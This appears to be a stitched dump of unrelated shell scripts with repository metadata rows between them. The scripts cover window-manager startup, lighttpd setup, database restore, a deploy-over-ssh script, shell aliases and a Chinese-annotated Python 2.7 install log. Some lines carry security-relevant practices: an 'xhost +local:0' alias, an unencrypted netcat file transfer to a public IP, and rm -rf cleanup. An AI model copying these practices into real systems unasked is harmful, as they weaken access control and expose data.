export _JAVA_AWT_WM_NONREPARENTING=1
# Start xmonad from the user's binary just in case anything ever happens to
# xmonad (e.g. is uninstalled)
exec ~/.local/bin/xmonad
| true
|
e41e0c8bed7c9a73b5489c304c77c0f25a61f3b6
|
Shell
|
LeCoyote/optware
|
/sources/clutch/postinst
|
UTF-8
| 463
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
CONF=/opt/etc/lighttpd/lighttpd.conf
test -f ${CONF} || exit 0
#uncomment fastcgi module
echo "Enabling fastgi module for lighttp"
sed -i -e '/^#[ \t]*"mod_fastcgi"/s/^#/ /' ${CONF}
#uncomment fastcgi.server
sed -i -e '/^#fastcgi.server/b uc;b;:uc;s/^#//;n;s/^#//;t uc' ${CONF}
SERVER_PORT=$(sed -ne 's/server.port.*=[ \t]*\+\([0-9]\{1,\}\)/\1/p'\
/opt/etc/lighttpd/lighttpd.conf)
echo "Point your browser to http://server.ip:${SERVER_PORT}/clutch"
| true
|
af77d14bc04d497b3d277b2e8a0ec44fc6c1f365
|
Shell
|
Fonmon/Fondo-DevOps
|
/environment/scripts/restore_env
|
UTF-8
| 1,132
| 3.59375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -x
if [ $# -ne 1 ]; then
echo 'Arguments: recovery_file'
exit 1
fi
source /etc/environment
RECOVERY_FILE=$1
cd $HOME_FONMON
tar -xzf $RECOVERY_FILE
# letsencrypt
cp -r recovery_files/letsencrypt/* /etc/letsencrypt
chown -R root:root /etc/letsencrypt
cd $(find /etc/letsencrypt/live/* -type d -name "*api*")
cp *.pem $HOME_FONMON/certificates/api
cd $(find /etc/letsencrypt/live/* -type d ! -name "*api*")
cp *.pem $HOME_FONMON/certificates/web
chown -R $USER_FONMON:$GROUP_FONMON $HOME_FONMON/certificates
cd $HOME_FONMON
# Fonmon files
cp recovery_files/fonmon/.env recovery_files/fonmon/fonmon-storage-credentials.json deploy/
cp -r recovery_files/fonmon/front/* front/
# Restore DB
DUMPS=($(ls recovery_files/fonmon/dumps/ | sort -r))
DUMP_DB="$(pwd)/recovery_files/fonmon/dumps/${DUMPS[0]}"
cd deploy/
source .env
mkdir Fondo-API Fondo-Web Fondo-MNS
docker-compose up -d fondodb
sleep 10
docker exec -i fondo_db psql -Ufondouser -d $POSTGRES_DATABASE < $DUMP_DB
# Tear down
cd $HOME_FONMON && rm -rf recovery_files $RECOVERY_FILE
rm -rf deploy/Fondo-API deploy/Fondo-Web deploy/Fondo-MNS
| true
|
035e760c029cfe5b3fabe55f2442d71e7fc441fd
|
Shell
|
7error/docker-harbor
|
/wait-for-postgres.sh
|
UTF-8
| 363
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash -e
# wait-for-postgres.sh
# Adapted from https://docs.docker.com/compose/startup-order/
# Expects the necessary PG* variables.
until psql -c '\l' -U "postgres" -tw >/dev/null 2>&1; do
echo >&2 "$(date +%Y%m%dt%H%M%S) Postgres is unavailable - sleeping"
sleep 4
done
echo >&2 "$(date +%Y%m%dt%H%M%S) Postgres is up - executing command"
exec ${@}
| true
|
24c6631ba85945581859ae792c7415c062ddbf55
|
Shell
|
semoho/Linux-Tutorial
|
/students-assignments/1/Assignment 06/calculator.sh
|
UTF-8
| 349
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Enter Two numbers: "
read a
read b
echo "Enter Operation: "
read ch
case $ch in
+)res=`echo $a + $b | bc`
;;
-)res=`echo $a - $b | bc`
;;
\*)res=`echo $a \* $b | bc`
;;
/)res=`echo "scale=5;$a / $b" | bc`
;;
^)res=`echo $a ^ $b | bc`
;;
%)res=`echo $a % $b | bc`
;;
esac
echo "Result: $res"
| true
|
75417fc48314ffa3c5ac79f080c33f7bdabca034
|
Shell
|
BackupTheBerlios/projectdev
|
/oldtree/current/base/cpio/PKGBUILD
|
UTF-8
| 609
| 2.78125
| 3
|
[] |
no_license
|
# $Id: PKGBUILD,v 1.1 2004/11/02 13:04:40 dpb Exp $
# Maintainer: judd <jvinet@zeroflux.org>
pkgname=cpio
pkgver=2.5
pkgrel=4
pkgdesc="A tool to copy files into or out of a cpio or tar archive"
url="http://www.gnu.org/software/cpio"
depends=('bash')
source=(ftp://ftp.gnu.org/gnu/cpio/cpio-$pkgver.tar.gz)
build() {
cd $startdir/src/$pkgname-$pkgver
./configure --prefix=/
make || return 1
make prefix=$startdir/pkg install
mkdir $startdir/pkg/usr
mv $startdir/pkg/man $startdir/pkg/usr
rm -f $startdir/pkg/bin/mt $startdir/pkg/usr/man/man1/mt.1
rm -rf $startdir/pkg/libexec
rm -rf $startdir/pkg/info
}
| true
|
939c2613c55d62a4f87953cf47bc56d558d43cf2
|
Shell
|
syranez/.bash
|
/alias
|
UTF-8
| 776
| 3.09375
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
#
# aliases
# jshint alias
alias jshint=/usr/lib/node_modules/jshint/bin/hint
if [[ ${OSTYPE//[0-9.]/} == 'darwin' ]]; then
alias ls="ls -G"
else
alias ls='ls --color=auto'
alias grep='grep --color=auto'
fi
alias ip='curl ifconfig.me'
# enable per default all Warnings, as recommended by JPL C-Coding-Standard D-60411
# removed stupid legacy stuff -Wtraditional
alias gcc='gcc -Wall -pedantic -std=iso9899:1999 -Wshadow -Wpointer-arith -Wcast-qual -Wcast-align -Wstrict-prototypes -Wmissing-prototypes -Wconversion'
# fixes "cannot connect to X server " errors
#+ it sets hard DISPLAY to 0.0, exports it and allows local connections.
alias fixX="DISPLAY=:0.0;export DISPLAY;xhost +local:0"
# english man
alias man="LANG=en_US.UTF-8 man"
| true
|
3552cb2efcbf2d8a51b4c395191d5452935fb422
|
Shell
|
kgyang/pi3
|
/buildall.sh
|
UTF-8
| 185
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
TARGET=$1
cd $(dirname $0)
make -C common $TARGET && make -C bcm2835 $TARGET && make -C DHT $TARGET
[[ "$TARGET" == "clean" ]] && {
cd $(dirname $0)
rm -rf lib bin
}
| true
|
ac37375a04e367fb0c7ea78b564be4e90a8cbaca
|
Shell
|
rajatk32/Assignments
|
/server-upgrade/deploy-servers
|
UTF-8
| 3,337
| 4.46875
| 4
|
[] |
no_license
|
#!/bin/sh
# script tested on ubuntu
# How the deployment works:
# If a server on the target machine is already running, its process id is extracted
# The server file is copied/replaced with scp command (If the old server was running, it still remains in operational state)
# If the old server was running, it is checked whether any clients are still connected to the server i.e. if there are active connections
# If there are active connections, we wait until the active connections are closed
# Once the active connections are closed, the server is killed using process id retrieved before
# The server is re-started (with the new/upgraded version)
# variables
username=ubuntu # this is a user who is authorized to update server files, ideally a deploy user should be created in all servers who has permission only to write in the server directory
keypath=/home/rajat/Downloads/obs_aws.pem # common key to be used to perform ssh or scp operations in servers
deployLocation=/home/ubuntu # assuming that all servers are deployed at a common location in different machines
goServerFileLocation=/home/rajat/Downloads/go-server.go
pythonServerFileLocation=/home/rajat/Downloads/python-server.py
luaServerFileLocation=/home/rajat/Downloads/lua-server.lua
goPort=8000
luaPort=8001
pythonPort=8002
# the deploy function takes in 5 parameters (in order):
# 1. process name of server as shown in ps command in linux
# 2. local server file location to copy from
# 3. port no. of the server
# 4. command which is used to run the server for e.g. "go run" is used to run a go server
# 5. file name of the server source file
deploy () {
# machines stores the list of ip addresses or hostnames on which servers have to be deployed
if [ "$1" = "python" ];then
machines=`./get-hostnames python-server`
elif [ "$1" = "lua" ];then
machines=`./get-hostnames lua-server`
elif [ "$1" = "go-server" ];then
machines=`./get-hostnames go-server`
fi
for mach in $machines
do
pid=`ssh -i $keypath $username@$mach pgrep $1`
`scp -i $keypath $2 $username@$mach:$deployLocation/`
if [ "$?" -eq "1" ]
then
echo "$mach: Upgrade failed, Reason: server file couldn't be replaced"
continue
else
echo "$mach: new server version file copied"
if [ "$pid" ]
then
clientsConnected=1
i=1
while [ "$clientsConnected" ]
do
clientsConnected=`ssh -f -i $keypath $username@$mach lsof -i:$3 | grep ESTABLISHED`
if [ "$clientsConnected" ] && [ $i = 1 ]
then
echo "$mach: waiting for release of active connections"
i=$((i+1))
fi
sleep 2
done
echo "$mach: no active connections: safe to kill"
`ssh -i $keypath $username@$mach sudo kill $pid`
fi
echo "$mach: deploying new server version"
ssh -f -i $keypath $username@$mach $4 $deployLocation/$5
echo "$mach: server successfully deployed"
fi
done
}
run () {
case "$1" in
go-server)
deploy go-server $goServerFileLocation $goPort "go run" go-server.go
;;
lua-server)
deploy lua $luaServerFileLocation $luaPort lua lua-server.lua
;;
python-server)
deploy python $pythonServerFileLocation $pythonPort python python-server.py
;;
*)
echo "invalid case"
;;
esac
}
if [ "$1" ];then
run $1
if [ "$2" ];then
run $2
fi
if [ "3" ];then
run $3
fi
else
echo "Usage: ./deploy-servers go-server lua-server python-server"
fi
| true
|
c978f6e8b277d6742a7ddddec76916534a27c904
|
Shell
|
brianclements/zsh
|
/zsh.d/colors.zsh
|
UTF-8
| 1,328
| 3.21875
| 3
|
[] |
no_license
|
autoload colors; colors
# The variables are wrapped in \%\{\%\}. This should be the case for every
# variable that does not contain space.
for COLOR in RED GREEN YELLOW BLUE MAGENTA CYAN BLACK WHITE; do
eval PR_$COLOR='%{$fg_no_bold[${(L)COLOR}]%}'
eval PR_BOLD_$COLOR='%{$fg_bold[${(L)COLOR}]%}'
done
eval RESET='$reset_color'
export PR_RED PR_GREEN PR_YELLOW PR_BLUE PR_WHITE PR_BLACK
export PR_BOLD_RED PR_BOLD_GREEN PR_BOLD_YELLOW PR_BOLD_BLUE
export PR_BOLD_WHITE PR_BOLD_BLACK
# Clear LSCOLORS
unset LSCOLORS
export CLICOLOR=1
# Main change, you can see directories on a dark background
#export tLSCOLORS=gxfxcxdxbxegedabagacad
LS_COLORS="di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32";
LSCOLORS="ExGxFxDxCxDxDxhbhdacEc";
# LSCOLORS=Gxfxcxdxbxegedabagacad # alt
# LS_COLORS=exfxcxdxbxegedabagacad # alt
# Do we need Linux or BSD Style?
if [[ $IS_LINUX -eq 1 ]]; then
# Linux Style
export LS_COLORS=$LS_COLORS
alias ls='ls --color=auto -F'
alias dir='dir --color=auto'
alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
else
# BSD Style
export LSCOLORS=$LSCOLORS
alias ls='ls -G'
fi
| true
|
e50a0caf843ed5187ff15768148e7071514b72e0
|
Shell
|
mgijax/pwi
|
/admin/stopserver.sh
|
UTF-8
| 218
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
if [ "${MGICONFIG}" != "" ]
then
source ${MGICONFIG}/master.config.sh
fi
source ../Configuration
PID=`pgrep -f "prodserver.py --port=$SERVER_PORT"`
printf "Killing process with pid=$PID\n"
kill -9 $PID
| true
|
1a3fdae85c6d871d81cdc1004d1f57138a2b4045
|
Shell
|
firepick1/ArduinoJson
|
/scripts/buildzip
|
UTF-8
| 578
| 3.59375
| 4
|
[
"MIT"
] |
permissive
|
#! /bin/bash
echo "SCRIPT : buildzip"
echo "HELP : build zip file for Arduino installation"
TAG=`git log --pretty=format:'%H' -n 1`
OUTPUT="ArduinoJson-$TAG.zip"
echo "STATUS : creating $OUTPUT"
rm -f $OUTPUT
pushd .. >& /dev/null
zip -r -q $OUTPUT \
ArduinoJson/CHANGELOG.md \
ArduinoJson/examples \
ArduinoJson/include \
ArduinoJson/keywords.txt \
ArduinoJson/LICENSE.md \
ArduinoJson/README.md \
ArduinoJson/library.json \
ArduinoJson/src \
ArduinoJson/ArduinoJson.h \
ArduinoJson/ArduinoJson.cpp \
-x \
ArduinoJson/src/CMakeLists.txt
popd >& /dev/null
| true
|
411896882b6b0f96fe783390752fc76284522f26
|
Shell
|
eliasdorneles/dotfiles
|
/bin/run-jison.sh
|
UTF-8
| 528
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
set -e
error(){ echo "$*"; exit 1; }
[ "x$1" = "x" ] && error """Usage: `basename $0` JISONFILE [INPUTFILE...]
If no INPUTFILEs are provided, the input will be read from STDIN
"""
jisonfile=$1; shift
[ -f "$jisonfile" ] || error "ERROR: File not found: $jisonfile"
outjison=`mktemp`
tmpfile=`mktemp`
# generate parser
jison -o "$outjison" "$jisonfile"
# run jison parser with stdin or filenames from arguments
cat "$@" > "$tmpfile"
node "$outjison" "$tmpfile"
# remove temp files
rm -f "$tmpfile" "$outjison"
| true
|
1ecb03190979ca619310bd7cd297f931c7095419
|
Shell
|
zhangaz1/dotfiles-58
|
/.setup/sync.sh
|
UTF-8
| 210
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -o errexit
set -o pipefail
_main() {
brew bundle --global dump --force && sed -i "s/, link: false//" ~/.Brewfile
code --list-extensions > "$HOME/.vscode/extensions/list"
}
_main
| true
|
13a9a6199a901df4f14b541617d7fb696dd57c0e
|
Shell
|
ZubairNabi/ciel
|
/scripts/check_space_workers.h
|
UTF-8
| 214
| 3.296875
| 3
|
[
"LicenseRef-scancode-other-permissive",
"ISC"
] |
permissive
|
#!/bin/bash
#SCRIPT: check_space_workers.sh
#PURPOSE: Check space on workers
FILENAME=$1
USERNAME=root
while read MACHINE
do
echo "Showing space on $MACHINE"
ssh -n $MACHINE df -h
done < $FILENAME
| true
|
bfd177f6121095a436b83b8faffe212d1ddd4d08
|
Shell
|
WIEQLI/devenv
|
/install_linux/install_oh_my_git.sh
|
UTF-8
| 151
| 2.5625
| 3
|
[] |
no_license
|
set -e
if [ ! -d $DEV_HOME/development/oh-my-git ]; then
cd $DEV_HOME/development
git clone https://github.com/arialdomartini/oh-my-git.git
fi
| true
|
b60fa34c45c66af6a4482b67bf17d069f579d274
|
Shell
|
supunj/sl2garmin
|
/map_locations.sh
|
UTF-8
| 923
| 2.515625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#Author: Supun Jayathilake (supunj@gmail.com)
# Content locations
MAP_ROOT=$(dirname $(readlink -f $0))
TEMP_LOC=$MAP_ROOT/tmp
STYLE_LOC=$MAP_ROOT/resources/style
TYP_LOC=$MAP_ROOT/resources/typ
MP_LOC=$MAP_ROOT/maps/mp
OSM_LOC=$MAP_ROOT/maps/osm
IMG_LOC=$MAP_ROOT/garmin
OTHER_IMG_LOC=$MAP_ROOT/maps/img
PBF_LOC=$MAP_ROOT/maps/pbf
GPI_LOC=$MAP_ROOT/gpi
#ICON_LOC=$MAP_ROOT/resources/icon
ARG_LOC=$MAP_ROOT/arg
PG_LOC=$MAP_ROOT/pg
# Tools
MKGMAP=$MAP_ROOT/tools/mkgmap/dist/mkgmap.jar
#MKGMAP_ALT=$MAP_TOOLS_LOC/mkgmap/dist/mkgmap.jars
OSMOSIS_LOC=$MAP_ROOT/tools/osmosis/package
OSMOSIS=$OSMOSIS_LOC/bin/osmosis
# Devices
DEVICE_1=/media/$USER/GARMIN
DEVICE_2=/media/$USER/GARMIN_SD
# Files
COASTLINE=$OSM_LOC/sri_lanka_coastline.osm
SOURCE_MAP_MP=$MP_LOC/sri_lanka_base.mp
SOURCE_MAP_PBF=$PBF_LOC/sri-lanka-latest.osm.pbf
export MKGMAP_JAVACMD=/usr/bin/java
export MKGMAP_JAVACMD_OPTIONS="-Xmx2048M -jar -enableassertions"
| true
|
48bb6bee65ebcafa30240f40caca789475b685c8
|
Shell
|
shanky123/test-cluster
|
/node_mgmt/node_warrior.sh
|
UTF-8
| 297
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# Logs in to HP ILO-card and resets the system
# Change user and password to fit you system
expect << EOF
set timeout 20
spawn telnet ipmi-$1
expect "login: "
send "admin\r"
expect "Password: "
send "admin\r"
expect "*>"
send "reset system1\r"
expect "*>"
send "exit\r"
EOF
| true
|
a95709292bebecff6bfc233da889112653cf3a7d
|
Shell
|
testee256/.dotfiles
|
/tools/find-by-time.sh
|
UTF-8
| 224
| 3.21875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/usr/bin/env bash
set -e
FIND_DIR=$1
FIND_NAME=$2
if [ ! -z "$3" ]; then EXTRA_ARGS="${@:3}"; else EXTRA_ARGS="-n -r"; fi
find $FIND_DIR -name $FIND_NAME -printf "%Ty-%Tm-%Td %TH:%TM:%.2TS %12s %p\n" | sort $EXTRA_ARGS
| true
|
72638fa96a40908c7150836002b1f6f21d107010
|
Shell
|
MalikHesham/Bash-Project
|
/disable_site.sh
|
UTF-8
| 359
| 3.21875
| 3
|
[] |
no_license
|
#!/bash/bash
# this script takes the website name from the user and disables it
# exit code 0 : success
read -p "Enter the site name to be disabled: " WEBSITE
cd /etc/apache2/sites-available
a2dissite $WEBSITE.conf
echo "$WEBSITE was disabled successfully"
# reloading apache2 to effects are done
echo "restarting apache2 ..."
service apache2 reload
exit 0
| true
|
7af1f651c0f01bfc2dafd7e7fdbd33ca9cf70af0
|
Shell
|
ttripp/searchlight-ui
|
/tools/gate/integration/post_test_hook.sh
|
UTF-8
| 419
| 3.015625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This script will be executed inside post_test_hook function in devstack gate
set -x
DIR=${BASH_SOURCE%/*}
source $DIR/commons $@
set +e
cd /opt/stack/new/searchlight-ui
sudo -H -u stack tox -e py27integration
retval=$?
set -e
if [ -d ${SEARCHLIGHT_UI_SCREENSHOTS_DIR}/ ]; then
cp -r ${SEARCHLIGHT_UI_SCREENSHOTS_DIR}/
/home/jenkins/workspace/gate-searchlight-ui-dsvm-integration/
fi
exit $retval
| true
|
00055f1ba78db26baaa44f9f9133cd0b8a44b081
|
Shell
|
mafm/asif
|
/bin/legalityTest.sh
|
UTF-8
| 297
| 2.796875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [ "$(dirname $0)" != "." ]
then
echo "You should run this from its directory. Run:"
echo " cd $(dirname $0)"
echo "and try again. :)"
exit 1
fi
src=$1
base="$(basename $1 | sed 's/\.pts//')"
ast=examples/pgms/$base
cd systemu
./.cabal-sandbox/bin/runLegalityTest $ast
| true
|
60470de947280a4b1c1c32cf2dd6f7ce3f840b68
|
Shell
|
biomechanics-hlrs-gebert/M-ROT-Rotational-Tensor-Optimization
|
/manage_geb-lib.sh
|
UTF-8
| 841
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# ----------------------------------------------------------------------------------------
# Johannes Gebert - Doctoral project - initialize the subtree of the Geberts Library
#
# Author: Johannes Gebert - HLRS - NUM - gebert@hlrs.de
# Created: 27.12.2021
# Last edit: 27.02.2022
# ----------------------------------------------------------------------------------------
# Update the subtree
#
if ! which git > /dev/null 2> /dev/null; then
echo "Git not found."
echo "The program cannot get updates from this directory."
echo "The program cannot compile if the »geb-lib« directory ist missing."
fi
#
if ls -l "$PWD"/geb-lib > /dev/null 2> /dev/null; then
operation="pull"
else
operation="add"
fi
#
git subtree $operation --prefix \
geb-lib git@github.com:biomechanics-hlrs-gebert/A-GLI-Geberts-Library.git \
main --squash
| true
|
4dd0f270ce293ef818a72686632abb2278ae94c0
|
Shell
|
bebyx/dtapi
|
/db.sh
|
UTF-8
| 1,023
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/sh
export DEBIAN_FRONTEND=noninteractive
# Update Debian10 and install needed packages
apt update && apt upgrade -y
apt install mariadb-server wget -y
# Run mysql_secure_installation script
mariadb -u root <<-EOF
UPDATE mysql.user SET Password=PASSWORD('') WHERE User='root';
DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');
DELETE FROM mysql.user WHERE User='';
DELETE FROM mysql.db WHERE Db='test' OR Db='test_%';
FLUSH PRIVILEGES;
EOF
# Create web app database and asign user
mariadb -u root <<-EOF
CREATE DATABASE dtapi;
GRANT ALL ON dtapi.* TO 'dtapi'@'%' IDENTIFIED BY 'password' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EOF
# Let database be publicly reachable
sed -i.bak '/bind-address/ s/127.0.0.1/0.0.0.0/' /etc/mysql/mariadb.conf.d/50-server.cnf
# Import mysql dump into web app database
wget -q https://dtapi.if.ua/~yurkovskiy/dtapi_full.sql
mariadb -u root dtapi < ./dtapi_full.sql
# Restart mysql service to enable new mysql config
systemctl restart mysql
| true
|
47224ee93cbc09e0a0401621719a083371299ddc
|
Shell
|
orial/Procesadores-de-Lenguajes
|
/JPL/runtest
|
UTF-8
| 945
| 4.25
| 4
|
[] |
no_license
|
#!/bin/bash
# Usage: `./runtest` will run all the tests under the `test` directory
# `./runtest test/NAME.pl` will run only the given test
passed_test=0;
# $1 path to the exercise
# $2 counter if any
correct_exercise () {
# Compile solution
bin/jplc $1 solution.j;
# Compile exercise
java -cp bin:../lib/java-cup-11b-runtime.jar JPLC $1 exercise.j;
# Run solution and execute
solution=`./jpl solution 1`;
# Run jasmin on exercise and execute
exercise=`./jpl exercise 1`;
name=$(basename "$1")
# Remove files
rm -f solution.j exercise.j;
if [[ $solution == $exercise ]]
then
echo "${2-1}. ${name} Ok!";
passed_test=$((passed_test+1));
else
echo "${2-1}. ${name} ERROR! Expected: ${solution} Given: ${exercise}";
fi
}
if [ $1 ]
then
correct_exercise $1;
else
count=0;
for filename in test/*;
do
correct_exercise $filename $count;
count=$((count+1));
done
echo "Nº of Ok!: ${passed_test}/${count}";
fi
| true
|
c37c4a588544edc89a42b4acf82e34ca28fe15e0
|
Shell
|
staneleigh/kodi_aio
|
/dialog_scripts/networking/wifi_settings.sh
|
UTF-8
| 2,252
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/bash
#wifi-configuration
#V1.0.0.0.A
if [[ $nw_iface != *eth* ]] && [ "$nw_wifi_present" = "true" ]
then
#ask for wifi configuration
if (whiptail --backtitle "$headline" --title "Configure Wifi" \
--yesno "\nWifi was selected as primary network interface but is not configured yet. \nDo you want to do this now? \n " 15 100)
then
#SSID for wifi-configuration
unset valid
while [ -z "$valid" ]; do
input=`whiptail --backtitle "$headline" \
--title "WiFi-configuration - SSID" \
--inputbox "\nConfirm or enter the SSID (network name) \nfor your wifi-configuration \n\n " 15 100 "YourNetworkName" 3>&1 1>&2 2>&3`
nw_wifi_ssid=$input
if [ -z "$input" ]
then
whiptail --backtitle "$headline" \
--title "Wrong input" \
--msgbox "\nYou didn't enter anything! :-(. \n\nPlease try again" 15 100
unset valid
else
valid="ok"
fi
done
#PSK for wifi-configuration
unset valid
while [ -z "$valid" ]; do
input=`whiptail --backtitle "$headline" \
--title "WiFi-configuration - PSK" \
--inputbox "\nConfirm or enter the PSK (pre-shared-key) for your wifi-configuration \n\n " 15 100 "YourNetworkPass" 3>&1 1>&2 2>&3`
nw_wifi_psk=$input
if [ -z "$input" ]
then
whiptail --backtitle "$headline" \
--title "Wrong input" \
--msgbox "\nYou didn't enter anything! :-(. \n\nPlease try again" 15 100
unset valid
else
valid="ok"
fi
done
#determine wifi nic
nw_iface=$(ifconfig -a | grep ^wlan.* | awk '{print $1}')
fi
fi
| true
|
67febbdcfd505192d80ad42b80711d59c075d696
|
Shell
|
un-knower/data-base
|
/api-test/py-test/Part4_FlaskWeb/c00_腾讯云安装python2.7.sh
|
UTF-8
| 7,757
| 2.859375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# go2infc 原本就有 python2.7 环境,需要安装pip2.7
alias go2infc="ssh 10.47.200.3"
# go127 只有 python2.6,需要安装 python2.7 和 pip2.7
alias go127="ssh 10.47.200.127"
# go203 原先只有python2.6环境,通过tar包成功安装 python2.7, 然后再补 pip2.7
alias go203="ssh 10.47.200.203"
###### 一、 go2infc 基于已有python2.7 创建虚拟环境
# 1)检查当前 pip 版本,不符合要求
pip --version
# pip 9.0.3 from /usr/lib/python2.6/site-packages (python 2.6)
# 2) 升级失败 SSL 协议被封
sudo pip install -U pip 升级失败
# 3) 成功检查到 python2.7 环境
python2.7
#Python 2.7.6 (default, Feb 10 2014, 12:41:37)
#[GCC 4.4.7 20120313 (Red Hat 4.4.7-3)] on linux2
#Type "help", "copyright", "credits" or "license" for more information.
#>>>
# 4) 使用现有 旧pip,安装 virtualenv
pip install virtualenv
# 5) 创建虚拟环境目录 并 开放权限
sudo mkdir /usr/local/penv2.7
sudo chmod 755 /usr/local/penv2.7
# 6) 基于现有的 python2.7 安装 虚拟环境,出现如下提示,即说明成功安装了整套 python2.7 环境到 /usr/local/penv2.7 目录
sudo virtualenv penv2.7 --python=python2.7
#New python executable in /usr/local/penv27/bin/python2.7
#Also creating executable in /usr/local/penv27/bin/python
#Installing setuptools, pip, wheel...done.
# 7) 激活虚拟环境 并查看 pip 版本
source /usr/local/penv2.7/bin/activate
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ pip --version
#pip 18.0 from /usr/local/penv27/lib/python2.7/site-packages/pip (python 2.7)
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ exit()
# 8)注销虚拟环境命令 (慎用)
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ deactivate
# 9)配置别名
sudo vim /etc/profile
alias python2.7="/usr/local/penv2.7/bin/python2.7"
alias pip2.7="/usr/local/penv2.7/bin/pip2.7"
source /etc/profile
#10) 测试
#pip2.7 install flask
# Downloading https://files.pythonhosted.org/packages/00/a4/cd587b2b19f043b65bf33ceda2f6e4e6cdbd0ce18d01a52b9559781b1da6/Flask-Script-2.0.6.tar.gz (43kB)
# 100% |████████████████████████████████| 51kB 138kB/s
#Collecting Flask (from flask-script)
###### 二、 go127 从无到有创建 python2.7 pip2.7 环境
# 经过多方测试,发现直接 在2.6.32-573.el6.x86_64 机器上 基于源码安装 Python2.7 都会失败,目前唯一对策是,拷贝 go2infc
# 已经成功安装的penv2.7环境到 go127 上,期待能够正常运行,或至少能够成功运行 python2.7 环境
#[huhao1@bi-infoc-txygz3-2 ~]$ uname -a
#Linux bi-infoc-txygz3-2 2.6.32-573.el6.x86_64 #1 SMP Thu Jul 23 15:44:03 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
# 1) go2infc 机器上打包现有的 python2.7 环境,并通过 rz 命令 传送到本地
sudo tar -zcvf penv2.7.tar.gz /usr/local/penv2.7
rz /usr/local/penv2.7.tar.gz
# 2)从本地将 penv2.7.tar.gz 发送到 go127
# 经测试 sz -b 命令传送文件会出现乱码,每次都传送失败,改用 nc 启动 tcp服务传送
# 接受端执行 curl httpbin.org/ip 获取,其外网地址
curl httpbin.org/ip
{
"origin": "118.89.34.125"
}
# 接收端先开启 nc 接受服务 (监听随意指定的8003端口,将接受的文件保存为penv2.7.tar.gz)
nc -l 8003 > penv2.7.tar.gz
# 发送端开始发送
nc 118.89.34.125 8003 < penv2.7.tar.gz
# 接受端成功接受后,会自动退出nc服务,解压,并移动到 /usr/local 目录
tar -zxvf penv2.7.tar.gz
sudo mv penv2.7 /usr/local/
# 3)安装virtualenv
pip install virtualenv
# 4)激活拷贝过来的 虚拟环境,发现直接进入了虚拟环境命令行,并可成功使用 python2.7 环境,但pip2.7 不能正常使用
source /usr/local/penv2.7/bin/activate
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ pthon2.7
#(penv27) Python 2.7.6 (default, Feb 10 2014, 12:41:37)
#(penv27) [GCC 4.4.7 20120313 (Red Hat 4.4.7-3)] on linux2
#(penv27) Type "help", "copyright", "credits" or "license" for more information.
#(penv27) >>>
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ pip --version
#Traceback (most recent call last):
# File "/usr/local/penv27/bin/pip2.7", line 7, in <module>
# from pip._internal import main
# File "/usr/local/penv2.7/lib/python2.7/site-packages/pip/_internal/__init__.py", line 2, in <module>
# from __future__ import absolute_import
# 5)重新回到了 go2infc 当初安装pip2.7 的环境
# 创建新虚拟环境目录
sudo mkdir /usr/local/penv27
sudo chmod 755 /usr/local/penv27
# 6) 基于现有的 python2.7 环境,重新再/usr/local/penv27 目录下安装一套新的python2.7,pip2.7环境
sudo virtualenv penv2.7 --python=/usr/local/penv2.7/bin/python2.7
#New python executable in /usr/local/penv27/bin/python2.7
#Also creating executable in /usr/local/penv27/bin/python
#Installing setuptools, pip, wheel...done.
# 7) 激活虚拟环境 并查看 pip 版本 Ctrl+D 退出
source /usr/local/penv2.7/bin/activate
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ pip --version
#pip 18.0 from /usr/local/penv27/lib/python2.7/site-packages/pip (python 2.7)
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ exit()
# 8)配置别名
sudo vim /etc/profile
alias python2.7="/usr/local/penv27/bin/python2.7"
alias pip2.7="/usr/local/penv27/bin/pip2.7"
source /etc/profile
# 9)测试 (大功告成)
#pip2.7 install flask
# Downloading https://files.pythonhosted.org/packages/00/a4/cd587b2b19f043b65bf33ceda2f6e4e6cdbd0ce18d01a52b9559781b1da6/Flask-Script-2.0.6.tar.gz (43kB)
# 100% |████████████████████████████████| 51kB 138kB/s
#Collecting Flask (from flask-script)
###### 一、 go203 参照 go127 从无到有 安装pip2.7失败,线上机器已经存在的 pip 不存在 re 模块
# 1)参照 go127 1~4)操作成功拷贝现有 penv2.7.tar.gz 解压到 /usr/local
# 2)下载 源码,成功安装
wget http://python.org/ftp/python/2.7.3/Python-2.7.3.tar.bz2
tar -jxvf Python-2.7.3.tar.bz2
./configure
cd Python-2.7.3
make all
sudo make install
python2.7
#Python 2.7.3 (default, Feb 10 2014, 12:41:37)
#[GCC 4.4.7 20120313 (Red Hat 4.4.7-3)] on linux2
#Type "help", "copyright", "credits" or "license" for more information.
#>>>
# 3) 接下来情况与go2infc 一致了
# 创建新虚拟环境目录
sudo mkdir /usr/local/penv27
